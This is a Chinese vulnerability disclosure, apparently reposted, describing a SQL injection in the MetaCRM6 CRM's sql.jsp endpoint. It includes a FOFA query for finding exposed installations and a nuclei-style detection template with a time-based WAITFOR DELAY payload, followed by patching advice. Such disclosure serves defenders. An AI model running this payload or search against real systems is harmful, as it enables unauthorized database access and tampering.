文章总结: MetaCRM6客户关系管理系统存在SQL注入漏洞,位于webappscommonjspsql.jsp文件,由于用户输入的sql参数未经过滤直接传入dbm.update(sql)执行,导致攻击者可执行恶意SQL语句。文章提供了漏洞复现方法和POC,建议联系厂商打补丁、升级版本、增加Web应用防火墙防护或关闭互联网暴露面来修复该漏洞。 综合评分: 85 文章分类: 漏洞分析,漏洞POC,WEB安全,漏洞预警,渗透测试
0day漏洞复现 | MetaCRM6客户关系管理系统存在SQL注入漏洞【附poc】
实战安全研究
2025年12月16日 10:00 广东
免责声明
| | | — | | 本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢! | | | | |
1
漏洞描述
MetaCRM作为一款智能化的平台型客户关系管理软件,旨在通过优化企业运营流程和协同办公机制,显著提升组织管理效能与业务处理效率,助力企业实现数字化卓越运营。漏洞位置位于webapps\common\jsp\sql.jsp文件,在第三行用户输入可控,接收参数为sql,之后第5行直接进入dbm.update(sql)完成SQL语句操作,从而形成SQL注入漏洞。
2
影响版本
MetaCRM6客户关系管理系统
3
fofa语法
fofa语法
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
4
漏洞复现
5
检测POC
id: MetaCRM6-sql-sqlinfo: name: MetaCRM6客户关系管理系统存在SQL注入漏洞 author: hamal severity: high description: MetaCRM6客户关系管理系统存在SQL注入漏洞 tags: 微信公众号(实战安全研究)http: - raw: - |+ GET /common/jsp/sql.jsp?sql= HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept: */* - |+ GET /common/jsp/sql.jsp?sql=;WAITFOR%20DELAY%20'0:0:4'-- HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept: */* matchers-condition: and matchers: - type: status status: - 200 - type: dsl dsl: - 'duration_1 < 2' - 'duration_2 >= 4' - 'duration_2 <= 10' condition: and - type: word part: body words: - 'SQL ok' condition: and
6
漏洞修复
1、建议联系厂商打补丁或升级版本。
2、增加Web应用防火墙防护。
3、关闭互联网暴露面或接口设置访问权限。
查看原文:《0day漏洞复现 | MetaCRM6客户关系管理系统存在SQL注入漏洞【附poc】》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论